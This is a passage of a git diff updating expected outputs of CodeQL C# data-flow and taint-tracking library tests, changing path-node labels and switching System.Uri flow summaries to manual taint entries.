| access to local variable y3 : SimpleClass [field field] : String | semmle.label | access to local variable y3 : SimpleClass [field field] : String | | GlobalDataFlow.cs:500:15:500:22 | access to field field | semmle.label | access to field field | -| GlobalDataFlow.cs:508:33:508:33 | [post] access to local variable x : SubSimpleClass [field field] : String | semmle.label | [post] access to local variable x : SubSimpleClass [field field] : String | -| GlobalDataFlow.cs:509:15:509:15 | access to local variable x : SubSimpleClass [field field] : String | semmle.label | access to local variable x : SubSimpleClass [field field] : String | +| GlobalDataFlow.cs:508:20:508:33 | [post] (...) ... : SimpleClass [field field] : String | semmle.label | [post] (...) ... : SimpleClass [field field] : String | +| GlobalDataFlow.cs:509:15:509:15 | access to local variable x : SimpleClass [field field] : String | semmle.label | access to local variable x : SimpleClass [field field] : String | | GlobalDataFlow.cs:509:15:509:21 | access to field field | semmle.label | access to field field | -| GlobalDataFlow.cs:515:20:515:20 | [post] access to parameter x : SimpleClass [field field] : String | semmle.label | [post] access to parameter x : SimpleClass [field field] : String | -| GlobalDataFlow.cs:515:25:515:25 | [post] access to local variable y : SimpleClass [field field] : String | semmle.label | [post] access to local variable y : SimpleClass [field field] : String | +| GlobalDataFlow.cs:515:20:515:25 | [post] ... ?? ... : SimpleClass [field field] : String | semmle.label | [post] ... ?? ... : SimpleClass [field field] : String | | GlobalDataFlow.cs:516:15:516:15 | access to parameter x : SimpleClass [field field] : String | semmle.label | access to parameter x : SimpleClass [field field] : String | | GlobalDataFlow.cs:516:15:516:21 | access to field field | semmle.label | access to field field | | GlobalDataFlow.cs:517:15:517:15 | access to local variable y : SimpleClass [field field] : String | semmle.label | access to local variable y : SimpleClass [field field] : String | | GlobalDataFlow.cs:517:15:517:21 | access to field field | semmle.label | access to field field | -| GlobalDataFlow.cs:527:20:527:20 | [post] access to local variable x : SimpleClass [field field] : String | semmle.label | [post] access to local variable x : SimpleClass [field field] : String | -| GlobalDataFlow.cs:528:20:528:20 | [post] access to local variable y : SimpleClass [field field] : String | semmle.label | [post] access to local variable y : SimpleClass [field field] : String | -| GlobalDataFlow.cs:529:18:529:18 | [post] access to local variable z : SimpleClass [field field] : String | semmle.label | [post] access to local variable z : SimpleClass [field field] : String | +| GlobalDataFlow.cs:525:20:530:9 | [post] ... switch { ... } : SimpleClass [field field] : String | semmle.label | [post] ... switch { ... } : SimpleClass [field field] : String | | GlobalDataFlow.cs:531:15:531:15 | access to local variable x : SimpleClass [field field] : String | semmle.label | access to local variable x : SimpleClass [field field] : String | | GlobalDataFlow.cs:531:15:531:21 | access to field field | semmle.label | access to field field | | GlobalDataFlow.cs:532:15:532:15 | access to local variable y : SimpleClass [field field] : String | semmle.label | access to local variable y : SimpleClass [field field] : String | | GlobalDataFlow.cs:532:15:532:21 | access to field field | semmle.label | access to field field | | GlobalDataFlow.cs:533:15:533:15 | access to local variable z : SimpleClass [field field] : String | semmle.label | access to local variable z : SimpleClass [field field] : String | | GlobalDataFlow.cs:533:15:533:21 | access to field field | semmle.label | access to field field | -| GlobalDataFlow.cs:538:20:538:21 | [post] access to parameter sc : SimpleClass [field field] : String | semmle.label | [post] access to parameter sc : SimpleClass [field field] : String | +| GlobalDataFlow.cs:538:20:538:22 | [post] ...! : SimpleClass [field field] : String | semmle.label | [post] ...! : SimpleClass [field field] : String | | GlobalDataFlow.cs:539:15:539:16 | access to parameter sc : SimpleClass [field field] : String | semmle.label | access to parameter sc : SimpleClass [field field] : String | | GlobalDataFlow.cs:539:15:539:22 | access to field field | semmle.label | access to field field | -| GlobalDataFlow.cs:546:24:546:24 | [post] access to local variable x : SimpleClass [field field] : String | semmle.label | [post] access to local variable x : SimpleClass [field field] : String | +| GlobalDataFlow.cs:546:20:546:24 | [post] ... = ... : SimpleClass [field field] : String | semmle.label | [post] ... = ... : SimpleClass [field field] : String | | GlobalDataFlow.cs:547:15:547:15 | access to local variable x : SimpleClass [field field] : String | semmle.label | access to local variable x : SimpleClass [field field] : String | | GlobalDataFlow.cs:547:15:547:21 | access to field field | semmle.label | access to field field | | GlobalDataFlow.cs:553:71:553:71 | e : null [element] : String | semmle.label | e : null [element] : String | diff --git a/csharp/ql/test/library-tests/dataflow/global/TaintTrackingPath.expected b/csharp/ql/test/library-tests/dataflow/global/TaintTrackingPath.expected index 43c462eaced6..8fcf385a4f52 100644 --- a/csharp/ql/test/library-tests/dataflow/global/TaintTrackingPath.expected +++ b/csharp/ql/test/library-tests/dataflow/global/TaintTrackingPath.expected @@ -461,46 +461,40 @@ edges | GlobalDataFlow.cs:469:21:469:21 | s : String | GlobalDataFlow.cs:469:32:469:32 | access to parameter s | provenance | | | GlobalDataFlow.cs:470:15:470:17 | access to parameter arg : String | GlobalDataFlow.cs:469:21:469:21 | s : String | provenance | | | GlobalDataFlow.cs:473:28:473:41 | "taint source" : String | GlobalDataFlow.cs:466:53:466:55 | arg : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:490:25:490:26 | [post] access to local variable x1 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:490:30:490:31 | [post] access to local variable x2 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:497:31:497:32 | [post] access to local variable y1 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:497:36:497:37 | [post] access to local variable y2 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:497:42:497:43 | [post] access to local variable y3 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:508:33:508:33 | [post] access to local variable x : SubSimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:515:20:515:20 | [post] access to parameter x : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:515:25:515:25 | [post] access to local variable y : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:527:20:527:20 | [post] access to local variable x : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:528:20:528:20 | [post] access to local variable y : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:529:18:529:18 | [post] access to local variable z : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:538:20:538:21 | [post] access to parameter sc : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:546:24:546:24 | [post] access to local variable x : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:490:20:490:31 | [post] ... ? ... : ... : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:497:20:497:43 | [post] ... ? ... : ... : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:508:20:508:33 | [post] (...) ... : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:515:20:515:25 | [post] ... ?? ... : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:525:20:530:9 | [post] ... switch { ... } : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:538:20:538:22 | [post] ...! : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:546:20:546:24 | [post] ... = ... : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:483:9:483:10 | [post] access to parameter sc : SimpleClass [field field] : String | GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:483:20:483:33 | "taint source" : String | GlobalDataFlow.cs:483:9:483:10 | [post] access to parameter sc : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:490:25:490:26 | [post] access to local variable x1 : SimpleClass [field field] : String | GlobalDataFlow.cs:491:15:491:16 | access to local variable x1 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:490:30:490:31 | [post] access to local variable x2 : SimpleClass [field field] : String | GlobalDataFlow.cs:492:15:492:16 | access to local variable x2 : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:490:20:490:31 | [post] ... ? ... : ... : SimpleClass [field field] : String | GlobalDataFlow.cs:491:15:491:16 | access to local variable x1 : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:490:20:490:31 | [post] ... ? ... : ... : SimpleClass [field field] : String | GlobalDataFlow.cs:492:15:492:16 | access to local variable x2 : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:491:15:491:16 | access to local variable x1 : SimpleClass [field field] : String | GlobalDataFlow.cs:491:15:491:22 | access to field field | provenance | | | GlobalDataFlow.cs:492:15:492:16 | access to local variable x2 : SimpleClass [field field] : String | GlobalDataFlow.cs:492:15:492:22 | access to field field | provenance | | -| GlobalDataFlow.cs:497:31:497:32 | [post] access to local variable y1 : SimpleClass [field field] : String | GlobalDataFlow.cs:498:15:498:16 | access to local variable y1 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:497:36:497:37 | [post] access to local variable y2 : SimpleClass [field field] : String | GlobalDataFlow.cs:499:15:499:16 | access to local variable y2 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:497:42:497:43 | [post] access to local variable y3 : SimpleClass [field field] : String | GlobalDataFlow.cs:500:15:500:16 | access to local variable y3 : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:497:20:497:43 | [post] ... ? ... : ... : SimpleClass [field field] : String | GlobalDataFlow.cs:498:15:498:16 | access to local variable y1 : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:497:20:497:43 | [post] ... ? ... : ... : SimpleClass [field field] : String | GlobalDataFlow.cs:499:15:499:16 | access to local variable y2 : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:497:20:497:43 | [post] ... ? ... : ... : SimpleClass [field field] : String | GlobalDataFlow.cs:500:15:500:16 | access to local variable y3 : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:498:15:498:16 | access to local variable y1 : SimpleClass [field field] : String | GlobalDataFlow.cs:498:15:498:22 | access to field field | provenance | | | GlobalDataFlow.cs:499:15:499:16 | access to local variable y2 : SimpleClass [field field] : String | GlobalDataFlow.cs:499:15:499:22 | access to field field | provenance | | | GlobalDataFlow.cs:500:15:500:16 | access to local variable y3 : SimpleClass [field field] : String | GlobalDataFlow.cs:500:15:500:22 | access to field field | provenance | | -| GlobalDataFlow.cs:508:33:508:33 | [post] access to local variable x : SubSimpleClass [field field] : String | GlobalDataFlow.cs:509:15:509:15 | access to local variable x : SubSimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:509:15:509:15 | access to local variable x : SubSimpleClass [field field] : String | GlobalDataFlow.cs:509:15:509:21 | access to field field | provenance | | -| GlobalDataFlow.cs:515:20:515:20 | [post] access to parameter x : SimpleClass [field field] : String | GlobalDataFlow.cs:516:15:516:15 | access to parameter x : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:515:25:515:25 | [post] access to local variable y : SimpleClass [field field] : String | GlobalDataFlow.cs:517:15:517:15 | access to local variable y : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:508:20:508:33 | [post] (...) ... : SimpleClass [field field] : String | GlobalDataFlow.cs:509:15:509:15 | access to local variable x : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:509:15:509:15 | access to local variable x : SimpleClass [field field] : String | GlobalDataFlow.cs:509:15:509:21 | access to field field | provenance | | +| GlobalDataFlow.cs:515:20:515:25 | [post] ... ?? ... : SimpleClass [field field] : String | GlobalDataFlow.cs:516:15:516:15 | access to parameter x : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:515:20:515:25 | [post] ... ?? ... : SimpleClass [field field] : String | GlobalDataFlow.cs:517:15:517:15 | access to local variable y : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:516:15:516:15 | access to parameter x : SimpleClass [field field] : String | GlobalDataFlow.cs:516:15:516:21 | access to field field | provenance | | | GlobalDataFlow.cs:517:15:517:15 | access to local variable y : SimpleClass [field field] : String | GlobalDataFlow.cs:517:15:517:21 | access to field field | provenance | | -| GlobalDataFlow.cs:527:20:527:20 | [post] access to local variable x : SimpleClass [field field] : String | GlobalDataFlow.cs:531:15:531:15 | access to local variable x : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:528:20:528:20 | [post] access to local variable y : SimpleClass [field field] : String | GlobalDataFlow.cs:532:15:532:15 | access to local variable y : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:529:18:529:18 | [post] access to local variable z : SimpleClass [field field] : String | GlobalDataFlow.cs:533:15:533:15 | access to local variable z : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:525:20:530:9 | [post] ... switch { ... } : SimpleClass [field field] : String | GlobalDataFlow.cs:531:15:531:15 | access to local variable x : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:525:20:530:9 | [post] ... switch { ... } : SimpleClass [field field] : String | GlobalDataFlow.cs:532:15:532:15 | access to local variable y : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:525:20:530:9 | [post] ... switch { ... } : SimpleClass [field field] : String | GlobalDataFlow.cs:533:15:533:15 | access to local variable z : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:531:15:531:15 | access to local variable x : SimpleClass [field field] : String | GlobalDataFlow.cs:531:15:531:21 | access to field field | provenance | | | GlobalDataFlow.cs:532:15:532:15 | access to local variable y : SimpleClass [field field] : String | GlobalDataFlow.cs:532:15:532:21 | access to field field | provenance | | | GlobalDataFlow.cs:533:15:533:15 | access to local variable z : SimpleClass [field field] : String | GlobalDataFlow.cs:533:15:533:21 | access to field field | provenance | | -| GlobalDataFlow.cs:538:20:538:21 | [post] access to parameter sc : SimpleClass [field field] : String | GlobalDataFlow.cs:539:15:539:16 | access to parameter sc : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:538:20:538:22 | [post] ...! : SimpleClass [field field] : String | GlobalDataFlow.cs:539:15:539:16 | access to parameter sc : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:539:15:539:16 | access to parameter sc : SimpleClass [field field] : String | GlobalDataFlow.cs:539:15:539:22 | access to field field | provenance | | -| GlobalDataFlow.cs:546:24:546:24 | [post] access to local variable x : SimpleClass [field field] : String | GlobalDataFlow.cs:547:15:547:15 | access to local variable x : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:546:20:546:24 | [post] ... = ... : SimpleClass [field field] : String | GlobalDataFlow.cs:547:15:547:15 | access to local variable x : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:547:15:547:15 | access to local variable x : SimpleClass [field field] : String | GlobalDataFlow.cs:547:15:547:21 | access to field field | provenance | | | GlobalDataFlow.cs:553:71:553:71 | e : null [element] : String | GlobalDataFlow.cs:556:27:556:27 | access to parameter e : null [element] : String | provenance | | | GlobalDataFlow.cs:556:27:556:27 | access to parameter e : null [element] : String | GlobalDataFlow.cs:558:46:558:46 | access to local variable x : String | provenance | | @@ -983,43 +977,37 @@ nodes | GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | semmle.label | sc [Return] : SimpleClass [field field] : String | | GlobalDataFlow.cs:483:9:483:10 | [post] access to parameter sc : SimpleClass [field field] : String | semmle.label | [post] access to parameter sc : SimpleClass [field field] : String | | GlobalDataFlow.cs:483:20:483:33 | "taint source" : String | semmle.label | "taint source" : String | -| GlobalDataFlow.cs:490:25:490:26 | [post] access to local variable x1 : SimpleClass [field field] : String | semmle.label | [post] access to local variable x1 : SimpleClass [field field] : String | -| GlobalDataFlow.cs:490:30:490:31 | [post] access to local variable x2 : SimpleClass [field field] : String | semmle.label | [post] access to local variable x2 : SimpleClass [field field] : String | +| GlobalDataFlow.cs:490:20:490:31 | [post] ... ? ... : ... : SimpleClass [field field] : String | semmle.label | [post] ... ? ... : ... : SimpleClass [field field] : String | | GlobalDataFlow.cs:491:15:491:16 | access to local variable x1 : SimpleClass [field field] : String | semmle.label | access to local variable x1 : SimpleClass [field field] : String | | GlobalDataFlow.cs:491:15:491:22 | access to field field | semmle.label | access to field field | | GlobalDataFlow.cs:492:15:492:16 | access to local variable x2 : SimpleClass [field field] : String | semmle.label | access to local variable x2 : SimpleClass [field field] : String | | GlobalDataFlow.cs:492:15:492:22 | access to field field | semmle.label | access to field field | -| GlobalDataFlow.cs:497:31:497:32 | [post] access to local variable y1 : SimpleClass [field field] : String | semmle.label | [post] access to local variable y1 : SimpleClass [field field] : String | -| GlobalDataFlow.cs:497:36:497:37 | [post] access to local variable y2 : SimpleClass [field field] : String | semmle.label | [post] access to local variable y2 : SimpleClass [field field] : String | -| GlobalDataFlow.cs:497:42:497:43 | [post] access to local variable y3 : SimpleClass [field field] : String | semmle.label | [post] access to local variable y3 : SimpleClass [field field] : String | +| GlobalDataFlow.cs:497:20:497:43 | [post] ... ? ... : ... : SimpleClass [field field] : String | semmle.label | [post] ... ? ... : ... : SimpleClass [field field] : String | | GlobalDataFlow.cs:498:15:498:16 | access to local variable y1 : SimpleClass [field field] : String | semmle.label | access to local variable y1 : SimpleClass [field field] : String | | GlobalDataFlow.cs:498:15:498:22 | access to field field | semmle.label | access to field field | | GlobalDataFlow.cs:499:15:499:16 | access to local variable y2 : SimpleClass [field field] : String | semmle.label | access to local variable y2 : SimpleClass [field field] : String | | GlobalDataFlow.cs:499:15:499:22 | access to field field | semmle.label | access to field field | | GlobalDataFlow.cs:500:15:500:16 | access to local variable y3 : SimpleClass [field field] : String | semmle.label | access to local variable y3 : SimpleClass [field field] : String | | GlobalDataFlow.cs:500:15:500:22 | access to field field | semmle.label | access to field field | -| GlobalDataFlow.cs:508:33:508:33 | [post] access to local variable x : SubSimpleClass [field field] : String | semmle.label | [post] access to local variable x : SubSimpleClass [field field] : String | -| GlobalDataFlow.cs:509:15:509:15 | access to local variable x : SubSimpleClass [field field] : String | semmle.label | access to local variable x : SubSimpleClass [field field] : String | +| GlobalDataFlow.cs:508:20:508:33 | [post] (...) ... : SimpleClass [field field] : String | semmle.label | [post] (...) ... : SimpleClass [field field] : String | +| GlobalDataFlow.cs:509:15:509:15 | access to local variable x : SimpleClass [field field] : String | semmle.label | access to local variable x : SimpleClass [field field] : String | | GlobalDataFlow.cs:509:15:509:21 | access to field field | semmle.label | access to field field | -| GlobalDataFlow.cs:515:20:515:20 | [post] access to parameter x : SimpleClass [field field] : String | semmle.label | [post] access to parameter x : SimpleClass [field field] : String | -| GlobalDataFlow.cs:515:25:515:25 | [post] access to local variable y : SimpleClass [field field] : String | semmle.label | [post] access to local variable y : SimpleClass [field field] : String | +| GlobalDataFlow.cs:515:20:515:25 | [post] ... ?? ... : SimpleClass [field field] : String | semmle.label | [post] ... ?? ... : SimpleClass [field field] : String | | GlobalDataFlow.cs:516:15:516:15 | access to parameter x : SimpleClass [field field] : String | semmle.label | access to parameter x : SimpleClass [field field] : String | | GlobalDataFlow.cs:516:15:516:21 | access to field field | semmle.label | access to field field | | GlobalDataFlow.cs:517:15:517:15 | access to local variable y : SimpleClass [field field] : String | semmle.label | access to local variable y : SimpleClass [field field] : String | | GlobalDataFlow.cs:517:15:517:21 | access to field field | semmle.label | access to field field | -| GlobalDataFlow.cs:527:20:527:20 | [post] access to local variable x : SimpleClass [field field] : String | semmle.label | [post] access to local variable x : SimpleClass [field field] : String | -| GlobalDataFlow.cs:528:20:528:20 | [post] access to local variable y : SimpleClass [field field] : String | semmle.label | [post] access to local variable y : SimpleClass [field field] : String | -| GlobalDataFlow.cs:529:18:529:18 | [post] access to local variable z : SimpleClass [field field] : String | semmle.label | [post] access to local variable z : SimpleClass [field field] : String | +| GlobalDataFlow.cs:525:20:530:9 | [post] ... switch { ... } : SimpleClass [field field] : String | semmle.label | [post] ... switch { ... } : SimpleClass [field field] : String | | GlobalDataFlow.cs:531:15:531:15 | access to local variable x : SimpleClass [field field] : String | semmle.label | access to local variable x : SimpleClass [field field] : String | | GlobalDataFlow.cs:531:15:531:21 | access to field field | semmle.label | access to field field | | GlobalDataFlow.cs:532:15:532:15 | access to local variable y : SimpleClass [field field] : String | semmle.label | access to local variable y : SimpleClass [field field] : String | | GlobalDataFlow.cs:532:15:532:21 | access to field field | semmle.label | access to field field | | GlobalDataFlow.cs:533:15:533:15 | access to local variable z : SimpleClass [field field] : String | semmle.label | access to local variable z : SimpleClass [field field] : String | | GlobalDataFlow.cs:533:15:533:21 | access to field field | semmle.label | access to field field | -| GlobalDataFlow.cs:538:20:538:21 | [post] access to parameter sc : SimpleClass [field field] : String | semmle.label | [post] access to parameter sc : SimpleClass [field field] : String | +| GlobalDataFlow.cs:538:20:538:22 | [post] ...! : SimpleClass [field field] : String | semmle.label | [post] ...! : SimpleClass [field field] : String | | GlobalDataFlow.cs:539:15:539:16 | access to parameter sc : SimpleClass [field field] : String | semmle.label | access to parameter sc : SimpleClass [field field] : String | | GlobalDataFlow.cs:539:15:539:22 | access to field field | semmle.label | access to field field | -| GlobalDataFlow.cs:546:24:546:24 | [post] access to local variable x : SimpleClass [field field] : String | semmle.label | [post] access to local variable x : SimpleClass [field field] : String | +| GlobalDataFlow.cs:546:20:546:24 | [post] ... = ... : SimpleClass [field field] : String | semmle.label | [post] ... = ... : SimpleClass [field field] : String | | GlobalDataFlow.cs:547:15:547:15 | access to local variable x : SimpleClass [field field] : String | semmle.label | access to local variable x : SimpleClass [field field] : String | | GlobalDataFlow.cs:547:15:547:21 | access to field field | semmle.label | access to field field | | GlobalDataFlow.cs:553:71:553:71 | e : null [element] : String | semmle.label | e : null [element] : String | diff --git a/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected b/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected index a336988a713e..4b7dc533819c 100644 --- a/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected +++ b/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected @@ -23466,29 +23466,33 @@ summary | System;Uri;ToString;();Argument[this];ReturnValue;taint;manual | | System;Uri;ToString;(System.String,System.IFormatProvider);Argument[this].SyntheticField[System.Uri._string];ReturnValue;value;dfc-generated | | System;Uri;ToString;(System.String,System.IFormatProvider);Argument[this];ReturnValue;taint;dfc-generated | -| System;Uri;TryCreate;(System.String,System.UriCreationOptions,System.Uri);Argument[0];ReturnValue.SyntheticField[System.Uri._string];value;dfc-generated | -| System;Uri;TryCreate;(System.String,System.UriKind,System.Uri);Argument[0];ReturnValue.SyntheticField[System.Uri._string];value;dfc-generated | -| System;Uri;TryCreate;(System.Uri,System.String,System.Uri);Argument[1];ReturnValue.SyntheticField[System.Uri._string];value;dfc-generated | -| System;Uri;TryCreate;(System.Uri,System.Uri,System.Uri);Argument[0];ReturnValue;taint;df-generated | -| System;Uri;TryCreate;(System.Uri,System.Uri,System.Uri);Argument[1];ReturnValue;taint;df-generated | +| System;Uri;TryCreate;(System.String,System.UriCreationOptions,System.Uri);Argument[0];Argument[2];taint;manual | +| System;Uri;TryCreate;(System.String,System.UriKind,System.Uri);Argument[0];Argument[2];taint;manual | +| System;Uri;TryCreate;(System.Uri,System.String,System.Uri);Argument[0];Argument[2];taint;manual | +| System;Uri;TryCreate;(System.Uri,System.String,System.Uri);Argument[1];Argument[2];taint;manual | +| System;Uri;TryCreate;(System.Uri,System.Uri,System.Uri);Argument[0];Argument[2];taint;manual | +| System;Uri;TryCreate;(System.Uri,System.Uri,System.Uri);Argument[1];Argument[2];taint;manual | | System;Uri;TryEscapeDataString;(System.ReadOnlySpan,System.Span,System.Int32);Argument[0].Element;Argument[1].Element;value;dfc-generated | | System;Uri;TryUnescapeDataString;(System.ReadOnlySpan,System.Span,System.Int32);Argument[0].Element;Argument[1].Element;value;dfc-generated | | System;Uri;UnescapeDataString;(System.ReadOnlySpan);Argument[0].Element;ReturnValue;taint;dfc-generated | | System;Uri;UnescapeDataString;(System.String);Argument[0];ReturnValue;value;dfc-generated | | System;Uri;Uri;(System.String);Argument[0];Argument[this];taint;manual | | System;Uri;Uri;(System.String,System.Boolean);Argument[0];Argument[this];taint;manual | -| System;Uri;Uri;(System.String,System.UriCreationOptions);Argument[0];Argument[this].SyntheticField[System.Uri._string];value;dfc-generated | +| System;Uri;Uri;(System.String,System.UriCreationOptions);Argument[0];Argument[this];taint;manual | | System;Uri;Uri;(System.String,System.UriKind);Argument[0];Argument[this];taint;manual | -| System;Uri;Uri;(System.Uri,System.String);Argument[1];Argument[this].SyntheticField[System.Uri._string];value;dfc-generated | -| System;Uri;Uri;(System.Uri,System.String,System.Boolean);Argument[1];Argument[this].SyntheticField[System.Uri._string];value;dfc-generated | +| System;Uri;Uri;(System.Uri,System.String);Argument[0];Argument[this];taint;manual | +| System;Uri;Uri;(System.Uri,System.String);Argument[1];Argument[this];taint;manual | +| System;Uri;Uri;(System.Uri,System.String,System.Boolean);Argument[0];Argument[this];taint;manual | +| System;Uri;Uri;(System.Uri,System.String,System.Boolean);Argument[1];Argument[this];taint;manual | | System;Uri;Uri;(System.Uri,System.Uri);Argument[0];Argument[this];taint;df-generated | | System;Uri;Uri;(System.Uri,System.Uri);Argument[1];Argument[this];taint;df-generated | | System;Uri;get_AbsolutePath;();Argument[this];ReturnValue;taint;df-generated | +| System;Uri;get_AbsoluteUri;();Argument[this];ReturnValue;taint;manual | | System;Uri;get_Authority;();Argument[this];ReturnValue;taint;df-generated | -| System;Uri;get_DnsSafeHost;();Argument[this].Property[System.Uri.IdnHost];ReturnValue;value;dfc-generated | +| System;Uri;get_DnsSafeHost;();Argument[this];ReturnValue;taint;manual | | System;Uri;get_Host;();Argument[this];ReturnValue;taint;df-generated | | System;Uri;get_IdnHost;();Argument[this];ReturnValue;taint;df-generated | -| System;Uri;get_LocalPath;();Argument[this].SyntheticField[System.Uri._string];ReturnValue;value;dfc-generated | +| System;Uri;get_LocalPath;();Argument[this];ReturnValue;taint;manual | | System;Uri;get_OriginalString;();Argument[this];ReturnValue;taint;manual | | System;Uri;get_PathAndQuery;();Argument[this];ReturnValue;taint;manual | | System;Uri;get_Query;();Argument[this];ReturnValue;taint;manual | diff --git a/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected b/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected index a426b2428454..f5b48a00292f 100644 --- a/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected +++ b/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected @@ -18122,29 +18122,33 @@ | System;Uri;MakeRelativeUri;(System.Uri);Argument[0];ReturnValue;taint;df-generated | | System;Uri;ToString;();Argument[this];ReturnValue;taint;manual | | System;Uri;ToString;(System.String,System.IFormatProvider);Argument[this].SyntheticField[System.Uri._string];ReturnValue;value;dfc-generated | -| System;Uri;TryCreate;(System.String,System.UriCreationOptions,System.Uri);Argument[0];ReturnValue.SyntheticField[System.Uri._string];value;dfc-generated | -| System;Uri;TryCreate;(System.String,System.UriKind,System.Uri);Argument[0];ReturnValue.SyntheticField[System.Uri._string];value;dfc-generated | -| System;Uri;TryCreate;(System.Uri,System.String,System.Uri);Argument[1];ReturnValue.SyntheticField[System.Uri._string];value;dfc-generated | -| System;Uri;TryCreate;(System.Uri,System.Uri,System.Uri);Argument[0];ReturnValue;taint;df-generated | -| System;Uri;TryCreate;(System.Uri,System.Uri,System.Uri);Argument[1];ReturnValue;taint;df-generated | +| System;Uri;TryCreate;(System.String,System.UriCreationOptions,System.Uri);Argument[0];Argument[2];taint;manual | +| System;Uri;TryCreate;(System.String,System.UriKind,System.Uri);Argument[0];Argument[2];taint;manual | +| System;Uri;TryCreate;(System.Uri,System.String,System.Uri);Argument[0];Argument[2];taint;manual | +| System;Uri;TryCreate;(System.Uri,System.String,System.Uri);Argument[1];Argument[2];taint;manual | +| System;Uri;TryCreate;(System.Uri,System.Uri,System.Uri);Argument[0];Argument[2];taint;manual | +| System;Uri;TryCreate;(System.Uri,System.Uri,System.Uri);Argument[1];Argument[2];taint;manual | | System;Uri;TryEscapeDataString;(System.ReadOnlySpan,System.Span,System.Int32);Argument[0].Element;Argument[1].Element;value;dfc-generated | | System;Uri;TryUnescapeDataString;(System.ReadOnlySpan,System.Span,System.Int32);Argument[0].Element;Argument[1].Element;value;dfc-generated | | System;Uri;UnescapeDataString;(System.ReadOnlySpan);Argument[0].Element;ReturnValue;taint;dfc-generated | | 